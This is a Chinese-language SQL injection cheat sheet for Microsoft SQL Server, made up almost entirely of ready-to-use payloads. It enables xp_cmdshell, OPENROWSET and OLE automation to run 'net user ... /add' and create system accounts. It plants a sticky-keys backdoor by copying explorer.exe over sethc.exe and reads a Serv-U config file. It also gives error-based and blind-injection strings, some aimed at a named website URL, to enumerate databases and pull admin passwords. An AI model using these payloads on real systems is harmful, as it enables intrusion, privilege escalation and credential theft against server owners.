一.开启扩展
1.开启xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
关闭xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC
sp_configure 'xp_cmdshell', 0;RECONFIGURE;--
dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
(添加xplog70.dll)
2.开启'OPENROWSET'
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec
sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--
查询分析器里执行select * from openrowset('microsoft.jet.oledb.4.0','
;database=c:/windows/system32/ias/ias.mdb',
'select shell("cmd.exe /c net user admin admin1234
/add")')来操作沙盘来添加个打点员
3.开启'sp_oacreate'
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec
sp_configure 'Ole Automation Procedures',1;RECONFIGURE;--
拷贝文件d:/windows/explorer.exe 至sethc.exe
declare @o int;exec sp_oacreate 'scripting.filesystemobject', @o
out ;exec sp_oamethod @o, 'copyfile',null,'d:/windows/explorer.exe'
,'c:/sethc.exe';
在查询分析器里执行
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT
EXEC SP_OAMETHOD
@shell,'run',null, 'C:/WINdows/system32/cmd.exe /c net user xcode
xcode /add'
这段代码就是操作SP_OAcreate来添加一个xcode的系统用户 然后直接晋升为打点员权限
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out,
'd:/Serv-U6.3/ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
这段代码就可以把ServUDaemon.ini里的配置信息全部显示出来
二.有显错,暴。
and 0<(select count(*) from master.dbo.sysdatabases);--折半法获得数据库个数
and 0<(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1);--依次提交 dbid = 2.3.4... 获得更多的数据库名
and 0<(select count(*) name from employ.dbo.sysobjects where xtype='U');--折半法获得表个数(假设暴出库名employ)
and 0<(select top 1 name from employ.dbo.sysobjects where xtype='U');--爆出一个表名
假设暴出表名为"employ_qj"则在上面语句上加条件 and name not in ('employ_qj' 以此一直加条件...
and 0<(select top 1 name from syscolumns where id in (select id from sysobjects where type = 'u' and name = 'employ_qj'));--爆出一个列名
假设暴出字段名为"id"则在上面语句上加上条件 and name not is('id') 以此一直加条件....
可能
爆库语句
and (select top 1 isnull(cast([name] as
nvarchar(500)),char(32))+char(124) from
[master].[dbo].[sysdatabases] where dbid in (select top N dbid from
[master].[dbo].[sysdatabases] order by dbid desc))=0--
爆表语句,somedb部份是所要列的数据库
and (select top 1 cast(name as varchar(200)) from (select top N
name from somedb.sys.all_objects where type=char(85) order by name)
t order by name desc)=0--
爆字段语句,爆表admin里user='admin'的密码字段
And (Select Top 1 isNull(cast([password] as
varchar(2000)),char(32))+char(124) From (Select Top N [password]
From [somedb]..[admin] Where user='admin' Order by [password]) T
Order by [password]Desc)=0--
三.无显错,盲注。
先说下SQL2005中的查询方法
select * from master.dbo.sysdatabases --查询数据库
select * from NetBook.dbo.sysobjects where xtype='u' --查询数据库NetBook里的表
select * from NetBook.dbo.syscolumns where id=object_id('book') --查询book表里的字段
判断权限:
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
and 1=(select IS_SRVROLEMEMBER('serveradmin'))
and 1=(select IS_SRVROLEMEMBER('setupadmin'))
and 1=(select IS_SRVROLEMEMBER('securityadmin'))
and 1=(select IS_SRVROLEMEMBER('diskadmin'))
and 1=(select IS_SRVROLEMEMBER('bulkadmin'))
and 1=(select IS_SRVROLEMEMBER('db_owner'))
盲注常规步骤:
判断库是否确实为MSSQL2005:
http://www.oldjun.com/oldjun.aspx?id=1 and substring((select
@@version),22,4)='2005'
猜数据库名:
先猜dbid:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from
master.dbo.sysdatabases where dbid=5)=1
按照dbid猜库名,先猜出长度:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from
master.dbo.sysdatabases where dbid=5 and len(name)=12)=1
再逐位猜:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from
master.dbo.sysdatabases where dbid=5 and
ascii(substring(name,1,1))>90)=1
猜表名(假设库名已经猜出为database):
可以尝试先看有没有管理表:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from
database.dbo.sysobjects where xtype='u' and name like
'%admin%')=1